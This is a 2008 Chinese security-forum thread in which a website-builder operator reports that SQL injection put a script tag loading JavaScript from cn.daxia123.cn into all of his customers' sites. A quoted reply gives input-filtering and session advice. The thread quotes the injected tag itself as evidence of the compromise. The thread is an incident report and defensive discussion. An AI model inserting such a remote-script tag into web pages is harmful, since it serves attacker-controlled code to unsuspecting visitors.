http://cn.daxia123.cn/cn.js数据库注入情况通报！ - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 入侵防御（HIPS） http://cn.daxia123.cn/cn.js数据库注入情况通报！

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

http://cn.daxia123.cn/cn.js数据库注入情况通报！

eduey 初生襁褓狮帖子:2 注册: 2008-12-27 来自:	发表于： 2008-12-27 22:06 \| 显示全部短消息资料字号：小中大 1楼 http://cn.daxia123.cn/cn.js数据库注入情况通报！网站出现问题。技术员说数据库被注入。所有能打开的网站都出现这样的代码 <script src=http://cn.daxia123.cn/cn.js></script> 。还有谁遇到这样的问题没有？交流一下，是怎样解决的？今天上网看了一下，又这样的代码的还不在少数，好多都关闭了。哪位朋友有好的解决方法？我的网站是自助建站系统，好多客户的网站打开后界面都错位了。点击链接没有反应。有的图片不能显示。我的是从前天（12.25号）开始的。昨天没有办法我关闭了。用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TheWorld) eduey 最后编辑于 2008-12-29 00:34:37
eduey 初生襁褓狮帖子:2 注册: 2008-12-27 来自:	分享到：

eduey 初生襁褓狮帖子:2 注册: 2008-12-27 来自:	发表于： 2008-12-28 12:57 \| 显示全部短消息资料字号：小中大 2楼回复: http://cn.daxia123.cn/cn.js数据库注入情况通报！引用: 原帖由 xutingxin 于 2008-12-28 12:43:00 发表解决办法：1 严格过滤 request.form 和 request.querystring 获取的内容，坚决不用 request("name") 这样的方式获取值，凡是采用 cookies 保存的内容，尽量不要用在sql语句里进行查询数据库操作；2 重要的用户资料尽量采用 session 验证，因为session是服务器端的，客户端无法伪造数据，除非他有你服务器的权限。感谢 xutingxin ！我网站暂时得到控制。昨晚守到12点没出现问题。 eduey 最后编辑于 2008-12-29 00:33:30
eduey 初生襁褓狮帖子:2 注册: 2008-12-27 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT